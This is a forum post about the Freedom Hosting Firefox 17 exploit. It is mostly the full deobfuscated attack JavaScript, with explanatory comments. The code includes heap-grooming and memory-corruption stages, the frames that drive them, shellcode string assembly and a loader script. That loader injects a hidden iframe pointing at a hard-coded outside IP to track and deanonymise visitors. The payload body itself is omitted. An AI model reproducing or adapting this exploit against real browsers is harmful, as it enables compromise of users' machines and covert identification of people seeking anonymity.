Is this an actual 'sploit, or is it just making use of some basic flaw in how Firefox handles this? We have a browser vulns thread here with all sorts of info on this subject... perhaps folks who have closer direct expertise in this can explain. It is interesting that the user-agent (Windows NT) and browser (Firefox) filter is applied so rigidly. They don't even waste time on other platforms or browser codebases, eh?
— edited to add: Kevin Poulsen has a typically excellent, timely summary of what's going on with this JS (which, as expected, I failed entirely to see). Quoting from his piece:
He cites Vlad Tsyrklevich as the source of the deobfuscation and code analysis; here's the underlying report. The heart of the malicious JavaScript is a tiny Windows executable hidden in a variable named “Magneto”. A traditional virus would use that executable to download and install a full-featured backdoor, so the hacker could come in later and steal passwords, enlist the computer in a DDoS botnet, and generally do all the other nasty things that happen to a hacked Windows box.
But the Magneto code doesn’t download anything. It looks up the victim’s MAC address — a unique hardware identifier for the computer’s network or Wi-Fi card — and the victim’s Windows hostname. Then it sends them to the Virginia server, coded as a standard HTTP web request.
Whilst the GitHub link is far more useful for code review, in case folks don't want to have to jump over there, here's the version of the code (I keep wanting to call it a "script" — apologies):

//nl7qbezu7pqsuone.onion/?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 iframe:
<html>
<body>
<iframe frameborder=0 border=0 height=1 width=1 id="iframe"> </iframe>
</body>
</html>
<script>
// Globals shared by every stage below. Names are the deobfuscated ones as posted.
var var1=0xB0;              // number of slots in var2/var3/var4 (loop bound in d(), k(), m(), p(), ad())
var var2 = new Array(var1); // ArrayBuffers, allocated in d()
var var3 = new Array(var1); // Int32Array views over var2, created in d()
var var4 = new Array(var1); // plain Arrays of 0x1ED00 ints; only some slots are populated (see d())
var var5=0xFF004;           // byteLength of every buffer in var2; k() looks for a slot whose length differs
var var6=0x3FC01;           // element count of each view in var3
var var7=0x60000000;        // written by q() at view[0x3FFFE], then compared against the next buffer's byteLength
var var8=0x18000000;        // view length used in x()
var var9=1;                 // stage flag: 1 after u(), 2 after v(); read by df() and w()
var var10 = 0x12000000;     // base term of the values computed in df(), f(), n(), o(), x()
var var11 = 0;              // set from p() in v(); multiplied by 0x10000 in those computations
var var12=0;                // set to 0xE8 in b() for Firefox 17.x only; df() returns 0 while it is 0
var var13 =0;               // computed in x(); base term for the values written by e(), f(), g(), l(), ac()
// Queried by the child frames (content_2.html and content_3.html call parent.df()).
// Returns 0 until b() has set var12 (i.e. only for Firefox 17.x) and var9 is 1 or 2;
// otherwise returns a value derived from var10/var11 minus var12.
function df()
{
if(var12==0)
{
return 0x00000000;
}
var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
if( var9 == 1 || var9 == 2)
return ( var14 - var12);
else
return 0x00000000;
}
// Version gate. al() yields -1 unless the UA reports Firefox on Windows NT (see aj()/ak()),
// so non-matching browsers and anything below 17 are sent to content_1.html.
// Only 17.x sets var12; without it df() keeps returning 0 and content_3 never
// registers its handler. Versions 18+ fall through with var12 untouched.
function b()
{
var version = al();
if(version <17)
{
window.location.href="content_1.html";
}
if( version >=17 && version <18 )
var12 = 0xE8;
return ;
}
// Points the 1x1 iframe declared in the HTML above at content_2.html.
// Called from u() (first stage) and again from v() (second stage).
function c()
{
var iframe=document.getElementById("iframe");
iframe.src="content_2.html";
}
// Allocation stage, run once from u(). Fills var2 with var1 ArrayBuffers of var5
// bytes, var3 with Int32Array views over them, and var4 (first var1/8 slots plus
// the last one) with large plain Arrays. The constants written here are markers
// that later stages search for: n() looks for 0x11336688 and 0x22556611, m() for
// 0x22556611.
// NOTE(review): the inner loop below uses `i` without `var`, so it assigns the
// global binding `i` -- which is also the name of function i() declared further
// down. Likely an artifact of the renaming; the listing may not run exactly as posted.
function d()
{
for(var j=0;j<var1;j++)
{
if( j<var1/8 || j==var1-1)
{
var tabb = new Array(0x1ED00);
var4[j]=tabb;
for(i=0;i<0x1ED00;i++)
{
var4[j][i]=0x11559944;
}
}
var2[j]= new ArrayBuffer(var5);
}
for(var j=0;j<var1;j++)
{
var3[j]= new Int32Array(var2[j],0,var6);
var3[j][0]=0x11336688;
for(var i=1;i<16;i++)
{
var3[j][0x4000*i] = 0x11446688;
}
}
for(var j=0;j<var1;j++)
{
if(typeof var4[j] !="undefined")
{
var4[j][0]=0x22556611;
}
}
}
// Fills the first 0x400 entries of `view` with var13+0x1010, then overrides a few
// fixed slots. view[0x0] and view[0x400-4] are re-set to the value the loop already
// wrote. view[0x400]/view[0x401] are overwritten again by every i() call.
function e(view)
{
var i=0;
for(i=0;i<0x400;i++)
{
view[i] = var13+0x1010 ;
}
view[0x0]=var13+0x1010;
view[0x44]=0x0;
view[0x45]=0x0;
view[0x400-4]=var13+0x1010;
view[0x400]=0x00004004;
view[0x401]=0x7FFE0300;
}
// Assembles the payload string and copies it into `view`.
// `{see below}` is the poster's placeholder for the omitted body of `magneto`
// (the "Magneto" executable discussed in the post); as posted that line is not valid JS.
// var15 is the pair returned by ah()/am(); var16 is the index found by n().
function f(var15,view,var16)
{
var magneto = "";
{see below}
var var29 = magneto;
// Fixed UTF-16 fragments concatenated around magneto; var20/var21 embed the upper
// 16 bits of var13. var24 is built but never used.
var var17 = "\u9060";
var var18 = "\u9061";
var var19 = "\uC481\u0000\u0008" ;
var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16) & 0x0000FFFF);
var var22 = "\uE589";
var var23 ="\uC3C9";
var var24 = "\uE889";
var24 += "\u608D\u90C0";
var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
var var26 = var25 + var16*4
var var27 =""
var27 += "\uB890\u2020\u2020";
// ae() packs each value into two chars, low half first.
var27 += "\uA390"+ae(var26+0x00);
var27 += "\uA390"+ae(var26+0x04);
var27 += "\uA390"+ae(var26+0x08);
var27 += "\uA390"+ae(var26+0x0C);
var var28 = var17;
var28 += var20;
var28 += var19;
var28 += var22;
var28 += var27;
var28 += var29;
var28 += var21;
var28 += var18;
var28 += var23;
// ag() repacks the combined string into 32-bit ints, two chars per int.
var var29Array = new Array();
var29Array=ag(var28);
var var29Ad = var13+0x5010;
var i=0;   // shadowed by the for-loops below
var j=0;   // unused
var var30=var13+0x4048;
// var31: indices 0-12 set explicitly, 15.. filled with var15[0]; 13 and 14 are left
// as holes, which become 0 when copied into the Int32Array view.
var var31 = new Array();
var31[0]=var30;
var31[1]=var30;
var31[2]=var30;
var31[3]=var15[1];
var31[4]=var29Ad;
var31[5]=0xFFFFFFFF;
var31[6]=var13+0x4044;
var31[7]=var13+0x4040;
var31[8]=0x00000040;
var31[9]=var13+0x4048;
var31[10]=0x00040000;
var31[11]=var29Ad;
var31[12]=var13+0x301C;
for(var i=0 ; i < 0x140 ; i++)
{
var31[i+15]=var15[0];
}
var var32 = 0x3F8;
view[0x800+0+var32]=var13+0x4018;
view[0x800+1+var32]=var13+0x4018;
for(var i=2 ; i < var31.length ; i++)
{
view[0x800+i+var32]= 0x41414141;
}
for(var i=0 ; i < var31.length ; i++)
{
view[0xC02+i+var32]= var31[i];
}
for(var i=0 ; i < var29Array.length ; i++)
{
view[0x1000 + i+var32] = var29Array[i];
}
}
// Uses h() to pick an index u in 4..7 and writes var13+0x3010 at view[0x404+u].
// Returns -1 if h() found nothing, else 1. The local `k` shadows function k(); `j` is unused.
function g(var50,view)
{
var k = h(var50,view);
var j=0;
if( k < 0 )
return -1;
view[0x404+k]=var13+0x3010;
return 1;
}
// Scans view[0x404+7] down to view[0x404+4]. For each value in (0xA0000, 0x80000000)
// it calls i() with that value, then reads chars 0x14/0x15 of whatever i() returned
// and compares af() of them with the value. Returns the first matching index or -1.
// NOTE(review): i() returns var4[var50][0]; that it is string-like at this point
// (so memory[0x14] is a char) is not visible in this listing.
function h(var50,view)
{
var address=0;
var u=0;
var memory="";
var var55=0;
for( u =7; u >=4 ;u--)
{
address=view[0x404+u];
if( address > 0x000A0000 && address < 0x80000000 )
{
memory = i(address,0x48,var50,view);
var55=af(memory[0x14]+memory[0x15]);
if(var55==address)
{
return u;
}
}
}
return -1;
}
// Writes (size/2)*0x10+4 to view[0x400] and `address` to view[0x401], then returns
// var4[var50][0]. Called by h() (size 0x48) and ac() (size 0x40).
// NOTE(review): shares its name with the undeclared loop variable `i` in d().
function i(address,size,var50,view)
{
var var56 = size/2;
var56 = var56*0x10 +0x04;
view[0x400]=var56;
view[0x401]=address;
return var4[var50][0];
}
// Repacks the string `memory` into ints via ag() and copies them to view[0x404..].
function j(memory,view)
{
var intArray=ag(memory);
for(var i=0 ; i < intArray.length ; i++)
{
view[0x404+i]=intArray[i];
}
}
// Returns the index of the first buffer in var2 whose byteLength no longer equals
// var5 (the size d() allocated), or -1 if every buffer still reports var5.
function k()
{
for(var j=0;j<var1;j++)
{
if(var2[j].byteLength!=var5)
{
return j;
}
}
return -1;
}
// Writes two values at view[var58] and view[var58+1]; called from x() right after e().
function l(view,var58)
{
view[var58] = var13 + 0x1030;
view[var58+1] = 0xFFFFFF85;
}
// Zeroes view[var58], then returns the index of the first populated var4 slot whose
// [0] is no longer the 0x22556611 marker d() wrote, or -1 if none changed.
// NOTE(review): x() does not check for -1 before indexing var4 with the result.
function m(view,var58)
{
view[var58]=0x00000000;
for(var j=0;j<var1;j++)
{
if(typeof var4[j] !="undefined")
{
if(var4[j][0]!=0x22556611)
return j;
}
}
return -1
}
// Follows a chain of indices through `view`, at most 200 steps: starts at 0, then at
// firstvar58, then at each step derives the next index from view[var58-0x0C] relative
// to var57. Stops at the first slot not holding 0x11336688: returns that index if the
// slot holds 0x22556611, otherwise -1. Both markers are the ones d() wrote.
function n(view,firstvar58)
{
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
var var58=0;
for(var i=0;i<200;i++)
{
if(view[var58] != 0x11336688)
{
if(view[var58] == 0x22556611 )
return var58;
else
return -1;
}
if(var58==0)
{
var58 = firstvar58;
}else{
var var59=view[var58-0x0C];
var58 = (var59 - var57)/4;
}
}
return -1;
}
// Reads view[0x3FFF4] from a 0x40400-element view over var2[var60] and converts it
// to an index relative to var57 (same formula as the chain step in n()).
function o(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
var var59 = view[0x00100000/4-0x0C];
var var57 = var10 + 0x00100000 + 0x00010000 * var11;
return ((var59 - var57)/4);
}
// Scans every var3 view at indices i*0x4000-2 (i = 1..15) for 0x01000000 and returns
// -i for the first hit, else 0. v() stores the result in var11.
function p()
{
for(var j=0;j<var1;j++)
{
for(var i=1;i<16;i++)
{
if(var3[j][i*0x4000-0x02]==0x01000000)
{
return -i;
}
}
}
return 0;
}
// Writes var7 at view[0x3FFFE] of a view over var2[var60], then returns var60+1 if
// the following buffer now reports byteLength == var7, else -1. r() later writes
// var5 back into the same slot.
// NOTE(review): no bounds check on var60+1; var2[var1] is undefined.
function q(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
view[0x00100000/4-0x02]=var7;
if(var2[var60+1].byteLength==var7)
return var60+1;
return -1;
}
// Counterpart of q(): writes var5 into the slot q() set to var7. Called from ac().
function r(var60)
{
var view = new Int32Array(var2[var60],0,0x00040400);
view[0x00100000/4-0x02]=var5;
}
// One-shot guard keyed on sessionStorage: true on the first call in a browsing
// session (and marks it), false on every later call. u() uses it so the stages
// only run once per session.
function t()
{
var alreadyRan = typeof sessionStorage.tempStor != "undefined";
if (alreadyRan)
return false;
sessionStorage.tempStor = "";
return true;
}
// First stage (invoked from the addEventListener line at the bottom). Runs once per
// session (t()): sets var9=1, applies the version gate b(), allocates via d(), then
// loads content_2.html into the iframe via c().
function u()
{
if( t() == true )
{
var9 = 1;
b();
d();
c();
}else{
return ;
}
}
// Second stage, reached via w() when var9 is 1. If k() finds no changed buffer,
// records p() in var11, sets var9=2 and reloads content_2.html; otherwise goes to x().
function v()
{
if(k() == -1)
{
var11 = p();
var9 = 2;
c();
}else{
x();
}
}
// Entry point called by content_2.html (parent.w()): dispatches on the stage flag.
function w()
{
if(var9==1)
v();
else
x();
}
// Final stage. Locates the buffer whose length changed (k()), pairs it with the next
// one (q()), walks the marker chain (o(), n()), finds the var4 slot whose marker was
// overwritten (m()), computes var13, writes via e()/l(), and hands off to ac().
// Each of k()/q()/n() can return -1 and aborts the stage; m() returning -1 is not
// checked, so var4[-1][0] would throw there.
function x()
{
var var60 = k();
if(var60==-1)
return ;
var nextvar60 = q(var60);
if(nextvar60==-1)
return ;
var var61 = o(var60);
var var62 = new Int32Array(var2[nextvar60],0,var8);
var var58 = n(var62,var61);
if(var58==-1)
return ;
var var50 = m(var62,var58);
var13 = var10 + 0x00100000 + 0x00010000 * var11;
e(var62);
l(var62,var58);
var var64 = var4[var50][0];
ac(var64,var50,var62,var58,var60);
}
// Stores a freshly created <span> element in var4[index][1]; z() later reads its innerHTML.
function y(index)
{
var4[index][1]= document.createElement('span') ;
}
// Reads var4[index][1].innerHTML and discards the result; the access itself is the
// point. `index2` is never used and ac() calls z() with a single argument.
function z(index,index2)
{
var4[index][1].innerHTML;
}
// Reads a single element out of `view` at index var63.
function aa(view,var63)
{
var element = view[var63];
return element;
}
// Stores `address` into `view` at index var63; returns nothing.
function ab(address,view,var63)
{
var target = view;
target[var63] = address;
}
// Last step of x(): derives the pair var15 from var64 via ah(), fills the view with
// f(), creates the span (y()), reads back via i()/j(), patches one slot with g(),
// restores q()'s write with r(), schedules cleanup ad() after 1s, and triggers the
// innerHTML read in z().
// NOTE(review): ah() returns undefined when am() has no matching entry, and f()
// then indexes var15[1] -- no check here.
function ac(var64,var50,var62,var58,var60)
{
var var15=ah(var64);
f(var15,var62,var58);
y(var50);
var var66 = aa(var62,var58+2);
var var67 = i(var66,0x40,var50,var62) ;
j(var67,var62);
g(var50,var62);
ab(var13+0x1040 ,var62,var58+2);
r(var60)
setTimeout(ad,1000);
z(var50);
}
// Cleanup scheduled by ac(): nulls every slot of var2/var3/var4 and then the arrays
// themselves. `delete` on a var-declared global is a no-op; the assignments to null
// are what actually release the references.
function ad()
{
for(var j=0;j<var1;j++)
{
delete var3[j]
var3[j]= null;
delete var2[j];
var2[j] = null;
if(typeof var4[j] !="undefined")
{
delete var4[j];
var4[j] = null;
}
}
delete var2;
delete var3;
delete var4;
var2=null;
var3=null;
var4=null;
}
// Packs a 32-bit integer into a two-character UTF-16 string: the low 16 bits
// become the first char, the high 16 bits the second. Inverse of af().
function ae(int32)
{
var halves = [int32 & 0x0000FFFF, (int32 >> 16) & 0x0000FFFF];
var chars = halves.map(function (half) { return String.fromCharCode(half); });
return chars.join("");
}
// Unpacks the first two UTF-16 chars of `string` into a 32-bit integer:
// char 0 is the low half, char 1 the high half. The shift is signed, so a
// high char >= 0x8000 yields a negative number. Inverse of ae().
function af(string)
{
var low = string.charCodeAt(0);
var high = string.charCodeAt(1);
return (high << 16) + low;
}
// Splits `string` into consecutive char pairs and converts each with af().
// An odd-length string is padded with one "\u9090" char so the last pair is complete.
function ag(string)
{
var padded = (string.length % 2 == 0) ? string : string + "\u9090";
var words = [];
for (var pos = 0; pos < padded.length; pos += 2)
words.push(af(padded.charAt(pos) + padded.charAt(pos + 1)));
return words;
}
// Reads a 32-bit value from chars 0-1 of var73 (same packing as af()); if that is 0,
// reads chars 32-33 instead. Looks the value up with am() and returns the resulting
// pair, or undefined when am() returned -1.
function ah(var73)
{
var var74 = var73.substring(0,2);
var var70 = var74.charCodeAt(0);
var var71 = var74.charCodeAt(1);
var var75 = (var71 << 16) + var70;
if (var75 == 0)
{
var var76 = var73.substring(32, 34);
var var70 = var76.charCodeAt(0);
var var71 = var76.charCodeAt(1);
var75 = (var71 << 16) + var70;
}
var var15 = am(var75);
if (var15 == -1)
{
return;
}
return var15
}
// Platform check: true when the user-agent string contains "Windows NT".
// The `version` argument is accepted for call compatibility but not used.
function aj(version)
{
var isWindowsNT = navigator.userAgent.indexOf("Windows NT") !== -1;
return isWindowsNT;
}
// Browser check from the user-agent string. The product name is the token between
// the last space and the last "/"; anything but "Firefox" yields -1. Otherwise the
// major version is the digits after that "/" up to the last "." (parseInt without a
// radix, exactly as the original; a version with no "." parses to NaN).
function ak()
{
var ua = navigator.userAgent;
var slash = ua.lastIndexOf("/");
var head = ua.substring(0, slash);
var product = head.substring(head.lastIndexOf(" ") + 1);
if (product != "Firefox")
return -1;
var tail = ua.substring(slash + 1);
return parseInt(tail.substring(0, tail.lastIndexOf(".")));
}
// Combined gate used by b(): returns ak()'s Firefox major version, or -1 when
// ak() rejected the browser or aj() did not see "Windows NT".
// `version` is assigned without `var`, so it becomes a global.
function al()
{
version = ak();
if (!aj(version))
return -1;
return version;
}
// Lookup keyed on the low 16 bits of var77 (the value ah() read from var4[var50][0]).
// Each branch subtracts a fixed base from var77 and returns the pair
// [var78 + a, var78 + b]; -1 when none of the 14 keys matches. These look like
// per-build constants, but which builds they correspond to is not stated on this page.
// `var78` is assigned without `var` in every branch, so it leaks as a global.
function am(var77)
{
var var15 = new Array(2);
if (var77 % 0x10000 == 0xE510)
{
var78 = var77 - 0xE510;
var15[0] = var78 + 0xE8AE;
var15[1] = var78 + 0xD6EE;
}
else if (var77 % 0x10000 == 0x9A90)
{
var78 = var77 - 0x69A90;
var15[0] = var78 + 0x6A063;
var15[1] = var78 + 0x68968;
}
else if (var77 % 0x10000 == 0x5E70)
{
var78 = var77 - 0x65E70;
var15[0] = var78 + 0x66413;
var15[1] = var78 + 0x64D34;
}
else if (var77 % 0x10000 == 0x35F3)
{
var78 = var77 - 0x335F3;
var15[0] = var78 + 0x4DE13;
var15[1] = var78 + 0x49AB8;
}
else if (var77 % 0x10000 == 0x5CA0)
{
var78 = var77 - 0x65CA0;
var15[0] = var78 + 0x66253;
var15[1] = var78 + 0x64B84;
}
else if (var77 % 0x10000 == 0x5CD0)
{
var78 = var77 - 0x65CD0;
var15[0] = var78 + 0x662A3;
var15[1] = var78 + 0x64BA4;
}
else if (var77 % 0x10000 == 0x6190)
{
var78 = var77 - 0x46190;
var15[0] = var78 + 0x467D3;
var15[1] = var78 + 0x45000;
}
else if (var77 % 0x10000 == 0x9CB9)
{
var78 = var77 - 0x29CB9;
var15[0] = var78 + 0x29B83;
var15[1] = var78 + 0xFFC8;
}
else if (var77 % 0x10000 == 0x9CE9)
{
var78 = var77 - 0x29CE9;
var15[0] = var78 + 0x29BB3;
var15[1] = var78 + 0xFFD8;
}
else if (var77 % 0x10000 == 0x70B0)
{
var78 = var77 - 0x470B0;
var15[0] = var78 + 0x47733;
var15[1] = var78 + 0x45F18;
}
else if (var77 % 0x10000 == 0x7090)
{
var78 = var77 - 0x47090;
var15[0] = var78 + 0x476B3;
var15[1] = var78 + 0x45F18;
}
else if (var77 % 0x10000 == 0x9E49)
{
var78 = var77 - 0x29E49;
var15[0] = var78 + 0x29D13;
var15[1] = var78 + 0x10028;
}
else if (var77 % 0x10000 == 0x9E69)
{
var78 = var77 - 0x29E69;
var15[0] = var78 + 0x29D33;
var15[1] = var78 + 0x10018;
}
else if (var77 % 0x10000 == 0x9EB9)
{
var78 = var77 - 0x29EB9;
var15[0] = var78 + 0x29D83;
var15[1] = var78 + 0xFFC8;
}
else
{
return -1;
}
return var15;
}
// NOTE(review): as written, u() is called immediately and its return value
// (undefined) is what gets registered as the listener; "onload" is also not the
// DOM event name ("load" is). Net effect: the first stage runs as soon as this
// script is evaluated, not on the load event.
window.addEventListener("onload", u(),true);
</script>
nl7qbezu7pqsuone.onion/content_2.html:
<!-- content_2.html (minified, as posted). First loaded by c() without the "?????" marker: it then inserts an iframe for content_3.html. content_3's error handler reloads this page with the marker, and that second load calls parent.w(). df() only proxies to the parent frame's df(). -->
<html><body></body></html><script>var y="?????",url=window.location.href;if(0>url.indexOf(y)){var iframe=document.createElement("iframe");iframe.src="content_3.html";document.body.appendChild(iframe)}else parent.w();function df(){return parent.df()};</script>
nl7qbezu7pqsuone.onion/content_3.html:
<script>/* content_3.html (minified, as posted). z is built up to the HTML string <body><img height='1' width='1' src='error.html' onerror="javascript: window.location.href='content_2.html?????';" ></body>: a broken image whose error handler navigates the frame back to content_2.html with the "?????" marker. */var y="?????",z="",z=z+"<body",z=z+">",z=z+"<img",z=z+" height='1' width='1' src='error.html'",z=z+' onerror="javascript: ',z=z+("window.location.href='content_2.html"+y+"';\" "),z=z+">",z=z+"</body",z=z+">",flag=!1,var83=0;
/* b(): allocates 1024 ArrayBuffers of 180 bytes with 45-element Int32Array views and stores var83 (the parent's df() value) at index 9 of each. a(): on its first call sets flag and calls window.stop(), then stops again, calls b(), writes z into the parent's first frame's document, and calls b() once more. The readystatechange handler is only registered when parent.df() returned non-zero, which per b() in the parent page means Firefox 17.x on Windows NT. */function b(){for(var e=Array(1024),d=Array(1024),c=0;1024>c;c++)e[c]=new ArrayBuffer(180);for(c=0;1024>c;c++)d[c]=new Int32Array(e[c],0,45),d[c][9]=var83;return d}function a(){!1==flag&&(flag=!0,window.stop());window.stop();b();window.parent.frames[0].frameElement.ownerDocument.write(z);b()}var83=parent.df();0!=var83&&document.addEventListener("readystatechange",a,!1);
</script>
// Sets document.cookie to name=value with path=/; when `minutes` is truthy an
// expires attribute that many minutes from now is appended, otherwise the cookie
// is a session cookie.
function createCookie(name,value,minutes) {
var expiresAttr = "";
if (minutes) {
var expiry = new Date();
expiry.setTime(expiry.getTime() + minutes * 60 * 1000);
expiresAttr = "; expires=" + expiry.toGMTString();
}
document.cookie = name + "=" + value + expiresAttr + "; path=/";
}
// Returns the value of the cookie called `name` from document.cookie, or null when
// absent. Entries are split on ";" and leading spaces (only spaces) are stripped
// before the "name=" prefix is compared.
function readCookie(name) {
var prefix = name + "=";
var entries = document.cookie.split(';');
for (var k = 0; k < entries.length; k++) {
var entry = entries[k].replace(/^ +/, '');
if (entry.indexOf(prefix) === 0) return entry.substring(prefix.length);
}
return null;
}
// Firefox detection: any of a Gecko-only document method, a Gecko-only window
// property, or "Firefox" in the user-agent string counts. Checks are made in the
// same order as the original so the same reference is evaluated first.
function isFF() {
if (document.getBoxObjectFor != null) return true;
if (window.mozInnerScreenX != null) return true;
return /Firefox/i.test(navigator.userAgent);
}
// Injects a small iframe pointing at the external host. The requestID value is the
// same string freedomhost() stores in the n_serv cookie. From a detection standpoint
// the hard-coded IP and the requestID query parameter are the observable indicators
// in proxy or DNS logs.
function updatify() {
var iframe = document.createElement('iframe');
iframe.style.display = "inline";
iframe.frameBorder = "0";
iframe.scrolling = "no";
iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";
iframe.height = "5";
iframe.width = "*";
document.body.appendChild(iframe);
}
// Runs updatify() at most once per 30 minutes per browser: the n_serv cookie acts
// as the "already served" marker. Nothing happens while the cookie is present.
function freedomhost() {
if (readCookie("n_serv")) return;
createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
updatify();
}
// Polls document.readyState every 250ms until the document is interactive or
// complete, then calls freedomhost() -- but only when isFF() says Firefox.
// The commented-out alert line is left as posted.
function isReady()
{
if ( document.readyState === "interactive" || document.readyState === "complete" ) {
if ( isFF() ) {
//window.alert(window.location + "Firefox Detected.")
freedomhost();
}
}
else
{
setTimeout(isReady, 250);
}
}
// Kick off the readiness poll; isReady() reschedules itself until the document is ready.
setTimeout(isReady, 250);